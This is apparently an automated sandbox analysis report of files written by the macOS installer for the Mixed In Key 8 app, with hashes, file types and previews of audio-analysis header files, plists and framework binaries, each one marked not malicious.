                                                                                                    SHA-512:9408083A63868D43B298000771E39E2D1BBA8E706A1D352B59A19134AFE19BC3B49959227AE58FAF39609453B59174F2439DBB2FAC105D0F3A952CB8D24AC51E
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: //.// MIKAnalysis.h.// MIKAnalysis.//.// Created by Patrick Machielse on 19-01-12..// Copyright (c) 2012 Mixed In Key LLC. All rights reserved..//...#import <MIKAnalysis/MIKKeytable.h>.#import <MIKAnalysis/MIKAnalysisSegment.h>.#import <MIKAnalysis/MIKEnergySegment.h>.#import <MIKAnalysis/MIKAnalysisCuePoint.h>..#import <MIKAnalysis/MIKKeyAnalyzer.h>.#import <MIKAnalysis/MIKNewKeyAnalyzer.h>..#import <MIKAnalysis/MIKBeats.h>.#import <MIKAnalysis/MIKBeatAnalyzer.h>..#import <MIKAnalysis/MIKVolumeAnalysis.h>.#import <MIKAnalysis/MIKVolumeAnalyzer.h>..#import <MIKAnalysis/MIKAudioSpectrum.h>.#import <MIKAnalysis/MIKWaveformAnalyzer.h>..#import <MIKAnalysis/MIKEnergyAnalyzer.h>
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/A/Headers/.BC.T_je5O5S
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII C++ program text
                                                                                                    Size (bytes):724
                                                                                                    Entropy (8bit):5.32385004115712
                                                                                                    Encrypted:false
                                                                                                    MD5:CEFD35AA14FEB877DBC4C3627A9D4A6E
                                                                                                    SHA1:6707A2A5AF5705B00FBC3259614386722016CDE4
                                                                                                    SHA-256:97CAD3A70FD32319A5F9652F2825BCC163C28C2949EB32D7591A16C25BAED0C4
                                                                                                    SHA-512:F68D6F0E7465B38516291E53E122953294EE37C3D6D04543ADE777380F1FDF90E4047C573AE0B7D8C2FCF5CEAC7C5239D9509F5CB373613831261EAA61A4406A
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: //.// MIKKeyAnalyzer.h.// MixedInKey.//.// Created by patrickm on 01-04-11..// Copyright 2011 Mixed In Key LLC. All rights reserved..//..#import <Foundation/Foundation.h>.#import <CoreAudio/CoreAudio.h>.#import <CoreMedia/CoreMedia.h>..@class MIKAnalysisSegment;..@interface MIKKeyAnalyzer : NSObject.- (instancetype)initWithNumberOfChannels:(NSUInteger)channels NS_DESIGNATED_INITIALIZER;..- (OSStatus)analyzeFrames:(UInt32)inNumberFrames fromBuffer:(AudioBufferList *)ioData;.- (OSStatus)analyzeFrames:(CMItemCount)inNumberFrames fromSampleBuffer:(CMSampleBufferRef)sampleBuffer;.- (BOOL)finishAnalysis;.- (void)getResult:(MIKAnalysisSegment *)result;..@property (nonatomic, readonly) MIKAnalysisSegment *result;.@end.
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/A/Headers/.BC.T_qAbHyx
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII C++ program text
                                                                                                    Size (bytes):745
                                                                                                    Entropy (8bit):5.33141788503387
                                                                                                    Encrypted:false
                                                                                                    MD5:92A20298E67AA8268AB667DC9B090634
                                                                                                    SHA1:B49A5E99A4BC1D6AFF81F16D35DB451D4D65FFDD
                                                                                                    SHA-256:5B165EA7B7D77ACA6AF71ADF6C6DCB22257DBD778AFF227FDF96B6D38A972ACB
                                                                                                    SHA-512:A2CB3BBB6396B1B8831B04F620E6D3496990E98E42A3C4C6DFB8E95659E84B7D14257DA2E020C821CD365B60C582DED78684CD2B47224EE6D099B5EC2B226121
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: //.// MIKEnergyAnalyzer.h.// MIKAnalysis.//.// Created by patrickm on 08-08-12..// Copyright (c) 2012 Mixed In Key LLC. All rights reserved..//..#import <Foundation/Foundation.h>.#import <CoreAudio/CoreAudio.h>.#import <CoreMedia/CoreMedia.h>...@interface MIKEnergyAnalyzer : NSObject.- (instancetype)init NS_UNAVAILABLE;.- (instancetype)initWithDuriation:(NSTimeInterval)duration skipStart:(double)startFraction skipEnd:(double)endFraction NS_DESIGNATED_INITIALIZER;.- (OSStatus)analyzeFrames:(UInt32)inNumberFrames fromBuffer:(AudioBufferList *)ioData;.- (OSStatus)analyzeFrames:(CMItemCount)inNumberFrames fromSampleBuffer:(CMSampleBufferRef)sampleBuffer;.- (BOOL)finishAnalysis;..@property (readonly, copy) NSArray *energySegments;.@end.
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/A/Headers/.BC.T_qddJ39
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII C++ program text
                                                                                                    Size (bytes):601
                                                                                                    Entropy (8bit):5.233783714049606
                                                                                                    Encrypted:false
                                                                                                    MD5:8B877A2615EEF7F006E66D44F6150D73
                                                                                                    SHA1:F13E3D959513A0D326790B2CF5D4AC65B045FC87
                                                                                                    SHA-256:DFCF64A5DEE82FF02604D0ECC1B6B79A8FA7BE0C1799AE7AF9DFB4EC6AEF650E
                                                                                                    SHA-512:227E409026139BF33BED1E0D802882DBA4221C5628779F889BBD5F1D11EF5C82391A8B58FE93DA07CAF2D1F244EF5629DD80CE8D5A1C8121EE5B1FEFF455BB92
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: //.// MIKWaveformAnalyzer.h.// MixedInKey.//.// Created by Andrew Madsen on 9/8/11..// Copyright 2011 Mixed In Key LLC. All rights reserved..//..#import <Foundation/Foundation.h>.#import <CoreAudio/CoreAudio.h>.#import "MIKAudioSpectrum.h"...@interface MIKWaveformAnalyzer : NSObject.+ (instancetype)analyzerWithAudioLength:(long long)numberOfSamples;.- (instancetype)initWithAudioLength:(long long)numberOfSamples;..- (OSStatus)analyzeFrames:(UInt32)inNumberFrames fromBuffer:(AudioBufferList *)ioData;.- (BOOL)finishAnalysis;..@property (nonatomic) MIKAudioSpectrum *spectrum; /* copies */.@end.
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/A/Headers/.BC.T_qyzYdV
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII C++ program text
                                                                                                    Size (bytes):974
                                                                                                    Entropy (8bit):5.0358269625170315
                                                                                                    Encrypted:false
                                                                                                    MD5:C702F0E2EC3150C063E3162E62469280
                                                                                                    SHA1:76AC90B3052DC8D62EB4E27DCB506B60AA517A8A
                                                                                                    SHA-256:0EA5AB2AFCF38AE26666D6C4BC417465682B862FE9D0E709A8D2E16B8EE4CED4
                                                                                                    SHA-512:F2719C0BC4EB1D02DE2F74B4B63C1C1D78B1AA090398A2E6996644BF7CC214E3E615E0A81AFF95E957FD3D44B7AB037D28D3B2D326CE2BA74B11316F1A716D92
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: //.// MIKEnergySegment.h.// MIKAnalysis.//.// Created by patrickm on 14-08-12..// Copyright (c) 2012 Mixed In Key LLC. All rights reserved..//..#import <Foundation/Foundation.h>...@interface MIKEnergySegment : NSObject <NSCoding>.+ (instancetype)segmentWithSegmentFeatures:(void /* EnergyFeatureExtractor::SegmentFeatures */ *)segmentFeatures;.- (instancetype)initWithSegmentFeatures:(void /* EnergyFeatureExtractor::SegmentFeatures */ *)segmentFeatures;.+ (instancetype)segmentWithJSONDictionary:(NSDictionary *)JSONDict;.- (instancetype)initWithJSONDictionary:(NSDictionary *)JSONDict;..@property (nonatomic, readonly, copy) NSDictionary *JSONDict;.@property (nonatomic, readonly) NSTimeInterval startTime;.@property (nonatomic, readonly) NSTimeInterval endTime;.@property (nonatomic, readonly) double volume;.@property (nonatomic, readonly) double tempo;.@property (nonatomic, readonly) NSArray *features;.@property (nonatomic, readonly) NSUInteger energyLevel;.@end.
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/A/Headers/.BC.T_xdKrcn
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII C++ program text
                                                                                                    Size (bytes):782
                                                                                                    Entropy (8bit):5.059556885346247
                                                                                                    Encrypted:false
                                                                                                    MD5:3664E4EA9C8D239CB2913CADBDBE9A82
                                                                                                    SHA1:CA0A3D0629511C5049A62A3C7D993C18A683EBEA
                                                                                                    SHA-256:6505FA759441E042A11E17575E9C2FDD7C6C8B8E31D959515AE75C29CDC25446
                                                                                                    SHA-512:AD42A6310E55CA9F2BD48019966C0BCAD859930B1EC8F58CF9BB05BF3196445F538C889C49B4E2F63EE499B9B83B970095F815E70134D235305A6A9BA5782ED0
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: //.// MIKBeats.h.// MixedInKey.//.// Created by patrickm on 24-02-11..// Copyright 2011 Mixed In Key LLC. All rights reserved..//..#import <Cocoa/Cocoa.h>...@interface MIKBeats : NSObject <NSCoding, NSCopying>.- (instancetype)initWithBeatTimes:(NSArray *)times;.+ (instancetype)beatsWithBeatTimes:(NSArray *)times;..- (NSTimeInterval)nearestBeatTime:(NSTimeInterval)time duration:(NSTimeInterval)duration;.- (NSUInteger)nearestBeatIndex:(NSTimeInterval)time;.- (NSTimeInterval)previousBeatTime:(NSTimeInterval)time;.- (NSTimeInterval)nextBeatTime:(NSTimeInterval)time;..@property (nonatomic, copy) NSArray<NSNumber *> *beatTimes;.@property (nonatomic) float tempo;.@property (nonatomic, readonly) float beatTempo;.@property (nonatomic, readonly) NSUInteger numberOfBeats;..@end.
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/A/Headers/.BC.T_yJVAeB
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII C program text
                                                                                                    Size (bytes):1155
                                                                                                    Entropy (8bit):4.949889119589293
                                                                                                    Encrypted:false
                                                                                                    MD5:DBCA453CFE33376CAF9120AD7FE1AAB6
                                                                                                    SHA1:73F25D19138C1D8A52B9A1949EA5905E7D2BC953
                                                                                                    SHA-256:1A922B07427E6A1231DCA10C723F49F0657372B2EA974E72E849C016C984A742
                                                                                                    SHA-512:D91EE6450D99703D6471DD229A39C274784665B02F614EDDD4665C3785E3A90CB9D2552B33C0CA06C6258846ADCD2B01EFA6E3EE66AB2280D9B83C968F610377
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /*. * MIKAudioSpectrum.h. * MixedInKey. *. * Created by patrickm on 28-02-09.. * Copyright 2009 Mixed In Key LLC. All rights reserved.. *. */..#include <stdbool.h>..//.main data structure.typedef struct {..long long.size;......//.length of left/right..float..*left;......//.left channel values..float..*right;......//.right channel values..bool..adjusted;.....//.adjusted for beats.} MIKAudioSpectrum;...//.create a new spectrum.MIKAudioSpectrum *MIKAudioSpectrumCreate(long long size);..//.destroy an existing spectrum.void MIKAudioSpectrumDispose(MIKAudioSpectrum *spectrum);..//.create a distinct copy of the passed in spectrum.MIKAudioSpectrum *MIKAudioSpectrumCopy(const MIKAudioSpectrum *spectrum);..//.create spectrum with linear beat pattern based on detected beats.//.beats are passed as relative locations in the spectrum [0.0, 1.0].MIKAudioSpectrum *MIKAudioSpectrumCopyAdjustedForBeats(const MIKAudioSpectrum *spectrum,.............. const double *beats,.............. unsigned in
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/A/Headers/.BC.T_zFxyM0
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII C++ program text
                                                                                                    Size (bytes):699
                                                                                                    Entropy (8bit):5.256874609527757
                                                                                                    Encrypted:false
                                                                                                    MD5:5CE3639AAA1B334F02833F702B92FD0A
                                                                                                    SHA1:BCA722ABB06D0EAD878C0FFFF6188EBCEF340C6D
                                                                                                    SHA-256:6BE3EFFBDA757DEFFC22B1203CADFB834D1DF801DE95DD6A78A6855E936CFB02
                                                                                                    SHA-512:C6B5F5DB0E49059CD52987DACC2CBFE13E1C75F91DE99E53A2E5FAE9FC8B58432B87C675378313978347F8C464588F7BE1FA3FEA4DA5477DDC041E39EFFE29DE
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: //.// MIKVolumeAnalyzer.h.// MixedInKey.//.// Created by patrickm on 02-04-11..// Copyright 2011 Mixed In Key LLC. All rights reserved..//..#import <Foundation/Foundation.h>.#import <CoreAudio/CoreAudio.h>.#import <CoreMedia/CoreMedia.h>...//.to pass around the volume histogram. Holds data for _all_ chanels..typedef struct histogram {..UInt64.data[1000];..size_t.size;.} Histogram;...@interface MIKVolumeAnalyzer : NSObject.- (OSStatus)analyzeFrames:(UInt32)inNumberFrames fromBuffer:(AudioBufferList *)ioData;.- (OSStatus)analyzeFrames:(CMItemCount)inNumberFrames fromSampleBuffer:(CMSampleBufferRef)sampleBuffer;..@property (readonly) float volume;.@property (readonly) BOOL isClipped;.@end.
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/A/PrivateHeaders/.BC.T_mcOfTc
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII C program text
                                                                                                    Size (bytes):1626
                                                                                                    Entropy (8bit):4.991353586513803
                                                                                                    Encrypted:false
                                                                                                    MD5:E41C4EF253D24B9EC72E048A3CD95391
                                                                                                    SHA1:94F12C72646CF82510F4DA587A8E9972BDB29EF0
                                                                                                    SHA-256:BDD3EC839985FD5F9A0897FA001454FA3D7D424C23B897122BF30AEC869B13D9
                                                                                                    SHA-512:6B364101F306F47D961D9E4107340C8494CC1046FD7CE3FA6AD7C3C0EB0AB9CB42E8E1F147705918A6A91D4A2A7C6F8639025F7F4F407483C83F57E3857CBC77
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /*. * MIKVolumeAnalysis.h. * MixedInKey. *. * Created by patrick machielse on 22-6-07.. * Copyright 2007 Mixed In Key LLC. All rights reserved.. *. */..#ifndef UInt64.#define UInt64 unsigned long long.#endif.../**. *.MIKVolumeAnalysis. *. *.Functions for performing volume analysis on an audio samples.. *.For historic reasons this is a pure C/C++ module.. */. .#if defined (__cplusplus).extern "C".{.#endif.....//.Clear the volume table. Call this before each analysis...void MIKClearVolume(UInt64 *hist, const int size);...//.Add a sample to the analysis...void MIKAddVolumeSample(UInt64 *hist, const int size, const float sample);...//.Calculate the RMS volume [dB] for all samples in bucket range [min, max]...//.Returns 1.0 if the range contains no samples...float MIKRangeVolumeDB(const UInt64 *hist, const int size, const int min, const int max);...//.Calculate the RMS volume [dB] for all samples in range [peak + threshold, peak]...//.Returns 1.0 if the range contains no samples...float
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/A/Resources/.BC.T_O2c6xo
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:XML document text
                                                                                                    Size (bytes):1350
                                                                                                    Entropy (8bit):5.2195931163044875
                                                                                                    Encrypted:false
                                                                                                    MD5:D881ED1E1ABEAB75A22E0688A2E35A57
                                                                                                    SHA1:AAF08CBA1E4C8DAF8932B46EFEAC7571EA3CE744
                                                                                                    SHA-256:EA0F4CB1EB0F6A49DE9F7E7799D95D809D3EA25F21B2392E9D6417B31AD5709B
                                                                                                    SHA-512:72B9FC8E2589B593125BF1B47DE49106DA1C7C68068175DE0BFD210A256B1AD982E54E36A70CA939F79AFE3EB0D0D949C860E5A23DC91B2B9D6DE1F83BB51616
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: <?xml version="1.0" encoding="UTF-8"?>.<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">.<plist version="1.0">.<dict>..<key>BuildMachineOSBuild</key>..<string>18G95</string>..<key>CFBundleDevelopmentRegion</key>..<string>English</string>..<key>CFBundleExecutable</key>..<string>MIKAnalysis</string>..<key>CFBundleIdentifier</key>..<string>com.mixedinkey.MIKAnalysis</string>..<key>CFBundleInfoDictionaryVersion</key>..<string>6.0</string>..<key>CFBundleName</key>..<string>MIKAnalysis</string>..<key>CFBundlePackageType</key>..<string>FMWK</string>..<key>CFBundleShortVersionString</key>..<string>1.0</string>..<key>CFBundleSignature</key>..<string>????</string>..<key>CFBundleSupportedPlatforms</key>..<array>...<string>MacOSX</string>..</array>..<key>CFBundleVersion</key>..<string>1</string>..<key>DTCompiler</key>..<string>com.apple.compilers.llvm.clang.1_0</string>..<key>DTPlatformBuild</key>..<string>9F2000</string>..<key>DTPlatformVersion
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/A/Resources/en.lproj/.BC.T_muzg7J
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Little-endian UTF-16 Unicode C program text
                                                                                                    Size (bytes):92
                                                                                                    Entropy (8bit):3.2610300066712608
                                                                                                    Encrypted:false
                                                                                                    MD5:51EF59B60E5B41B91519CC662A9FE886
                                                                                                    SHA1:3222CA0C39EB50AAF8126BAF852E55430C4718AF
                                                                                                    SHA-256:39CF2EE07B7B333E7C179D0BF4D798A5B72AF6A4E584F51E642703BBFA4FC828
                                                                                                    SHA-512:3952A908B72D44040F5072F6344F6327FC78981C3AA55E931ACAE84C0C9BCC0D148991CD564AF4803765C328CBF5F7EFE9EB558FC56E47E8206B7B706026F30A
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ../.*. .L.o.c.a.l.i.z.e.d. .v.e.r.s.i.o.n.s. .o.f. .I.n.f.o...p.l.i.s.t. .k.e.y.s. .*./.....
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/A/_CodeSignature/.BC.T_2voPfS
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:XML document text
                                                                                                    Size (bytes):6031
                                                                                                    Entropy (8bit):5.204992778518468
                                                                                                    Encrypted:false
                                                                                                    MD5:4F99A0D02357F047A2310D4FBB0D935A
                                                                                                    SHA1:8E3EC654E5D9246C49EDF5661A8CBFFCA334AA79
                                                                                                    SHA-256:6FF80B298C2B0A5DC1647E36B66CFACABFDE26FEF97AB91C08944905FA6C9291
                                                                                                    SHA-512:2BA51CE7859F4E5FDFAFAD238A2EA844445BEF85C1C6C4A7B975DF150387DEFCAFB91A2F41BC7B9E687C53C2745048812918F111DF2D1EA989A46D2696578BDC
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: <?xml version="1.0" encoding="UTF-8"?>.<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">.<plist version="1.0">.<dict>..<key>files</key>..<dict>...<key>Resources/Info.plist</key>...<data>...qvCMuh5Mja+JMrRu/qx1ceo850Q=...</data>...<key>Resources/en.lproj/InfoPlist.strings</key>...<dict>....<key>hash</key>....<data>....MiLKDDnrUKr4EmuvhS5VQwxHGK8=....</data>....<key>optional</key>....<true/>...</dict>..</dict>..<key>files2</key>..<dict>...<key>Headers/MIKAnalysis.h</key>...<dict>....<key>hash</key>....<data>....bBlMq3kXXqG6Pu4+cJxrwVJFt2E=....</data>....<key>hash2</key>....<data>....4owofQKzsJSygIuqjASC6Pmrisvg7RiYKwee+O6avII=....</data>...</dict>...<key>Headers/MIKAnalysisCuePoint.h</key>...<dict>....<key>hash</key>....<data>....0n7472x6L5B33hnK5MrPFCJ8+6A=....</data>....<key>hash2</key>....<data>....DmPFWidc0e28gJOSvXS4nFc9fkkA/Qpkg35WtF/zpKg=....</data>...</dict>...<key>Headers/MIKAnalysisSegment.h</key>...<dict>....<key>hash</key>.
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKAudio.framework/Versions/A/.BC.T_wuooQy
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Mach-O 64-bit dynamically linked shared library
                                                                                                    Size (bytes):159648
                                                                                                    Entropy (8bit):5.925851630215788
                                                                                                    Encrypted:false
                                                                                                    MD5:383ABF310D9BFC481F789BE24C962369
                                                                                                    SHA1:9197B7EB916D916900B517FA9E34F0DA54779211
                                                                                                    SHA-256:336BFB5D078A6F99709A7C0EDDAE3CDC79F5B3A89FB6A0713ECEC6BB47B9ECCD
                                                                                                    SHA-512:D10EC73E5DEBB05DD4E848F415BE645087A46B0CE2CB3888538CE104919B55A92DF19D89E6B986912BA64C394579BB060B4A39B7E78BDF6D86ADA641C93AE7AE
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ....................(...............h...__TEXT...................p...............p......................__text..........__TEXT.......... ............... ...............................__stubs.........__TEXT...........#......|........#..............................__stub_helper...__TEXT...........%......4........%..............................__const.........__TEXT...........)......P........)..............................__cstring.......__TEXT..................=.......................................__objc_methname.__TEXT..........MJ..............MJ..............................__objc_classname__TEXT...........O......]........O..............................__objc_methtype.__TEXT..........uO..............uO..............................__unwind_info...__TEXT...........R...............R..............................__eh_frame......__TEXT...........U......x........U..................................8...__DATA...........p....... .......p....... ......................__nl_symbol_ptr.__DATA..
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKAudio.framework/Versions/A/Resources/.BC.T_fibLqQ
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:XML document text
                                                                                                    Size (bytes):1283
                                                                                                    Entropy (8bit):5.233067346430371
                                                                                                    Encrypted:false
                                                                                                    MD5:EDCD136D3414F146AB0E936DFA8684EF
                                                                                                    SHA1:EFC28C4A34F333D37F7A5208DAD83AA67D4C303F
                                                                                                    SHA-256:B8EA49BEBF6B51AD96E5CBA41832FC94000CEA137C9ABDF4C5E5ED4F1BE1B182
                                                                                                    SHA-512:1DE74C5E590C8D18472F6535611894EF9A05221284FA36257CD185E4C4CD8E1E9C65E88EB5B3BCECC382A8480223B5351AECC86C2C153F5E5F32BC7A46E30999
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: <?xml version="1.0" encoding="UTF-8"?>.<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">.<plist version="1.0">.<dict>..<key>BuildMachineOSBuild</key>..<string>18G95</string>..<key>CFBundleDevelopmentRegion</key>..<string>en</string>..<key>CFBundleExecutable</key>..<string>MIKAudio</string>..<key>CFBundleIdentifier</key>..<string>com.mixedinkey.MIKAudio</string>..<key>CFBundleInfoDictionaryVersion</key>..<string>6.0</string>..<key>CFBundleName</key>..<string>MIKAudio</string>..<key>CFBundlePackageType</key>..<string>FMWK</string>..<key>CFBundleShortVersionString</key>..<string>1.0</string>..<key>CFBundleSupportedPlatforms</key>..<array>...<string>MacOSX</string>..</array>..<key>CFBundleVersion</key>..<string>1</string>..<key>DTCompiler</key>..<string>com.apple.compilers.llvm.clang.1_0</string>..<key>DTPlatformBuild</key>..<string>9F2000</string>..<key>DTPlatformVersion</key>..<string>GM</string>..<key>DTSDKBuild</key>..<string>17E189<
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKAudio.framework/Versions/A/_CodeSignature/.BC.T_M74tW7
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:XML document text
                                                                                                    Size (bytes):2514
                                                                                                    Entropy (8bit):4.911658816604725
                                                                                                    Encrypted:false
                                                                                                    MD5:CD7A003B04FBA1C423BCCC3BE26EC9BD
                                                                                                    SHA1:7F3FBEF1BA9984FE21E5459D8F66769F75F0D6AB
                                                                                                    SHA-256:95644765E77A06F5B60B41FC466F9BE48A1853878EF8B84C1DB1768D484C245F
                                                                                                    SHA-512:59B48F4745E574E5C52FA0B4745A81383E38B7CE9856DFB9AAE7E9A805BB30B4A17BC994142B835121C567E929CBFDFD44FC1CE9B006B606AEB5F8DBFA6590A7
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: <?xml version="1.0" encoding="UTF-8"?>.<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">.<plist version="1.0">.<dict>..<key>files</key>..<dict>...<key>Resources/Info.plist</key>...<data>...78KMSjTzM9N/elII2tg6pn1MMD8=...</data>..</dict>..<key>files2</key>..<dict>...<key>Resources/Info.plist</key>...<dict>....<key>hash</key>....<data>....78KMSjTzM9N/elII2tg6pn1MMD8=....</data>....<key>hash2</key>....<data>....uOpJvr9rUa2W5cukGDL8lAAM6hN8mr30xeXtTxvhsYI=....</data>...</dict>..</dict>..<key>rules</key>..<dict>...<key>^Resources/</key>...<true/>...<key>^Resources/.*\.lproj/</key>...<dict>....<key>optional</key>....<true/>....<key>weight</key>....<real>1000</real>...</dict>...<key>^Resources/.*\.lproj/locversion.plist$</key>...<dict>....<key>omit</key>....<true/>....<key>weight</key>....<real>1100</real>...</dict>...<key>^Resources/Base\.lproj/</key>...<dict>....<key>weight</key>....<real>1010</real>...</dict>...<key>^version.plist$</key>
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/.BC.T_5CTIwR
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Mach-O 64-bit dynamically linked shared library
                                                                                                    Size (bytes):190048
                                                                                                    Entropy (8bit):5.536596703149716
                                                                                                    Encrypted:false
                                                                                                    MD5:C460B4A834629120E7C5F6676DDEE108
                                                                                                    SHA1:6F8F9E18B49D7AAEF50B6F5B95EB261C1CEFC5C9
                                                                                                    SHA-256:CF64193F27B7D522C6EC1189A44AD055C868E74CA1AA2B498A2EE8A557602589
                                                                                                    SHA-512:B8EC7D20603443227E1101137FFBFAF1232109797443057D2BBEBEC3BBB7658639B5E7E8672C8CE4E3B05190EA0D871E87E7B32B0A84EA2D1859A3DD0217F8FB
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ....................0...................__TEXT..........................................................__text..........__TEXT..........2...............2...............................__stubs.........__TEXT..................:.......................................__stub_helper...__TEXT..........@...............@...............................__gcc_except_tab__TEXT..........................................................__cstring.......__TEXT...........%...............%..............................__objc_methname.__TEXT..........|=......z$......|=..............................__objc_classname__TEXT...........a...............a..............................__objc_methtype.__TEXT...........c......D........c..............................__const.........__TEXT...........h......H........h..............................__unwind_info...__TEXT..........Hh......L.......Hh..............................__eh_frame......__TEXT...........k......h4.......k..................................8...__DATA..
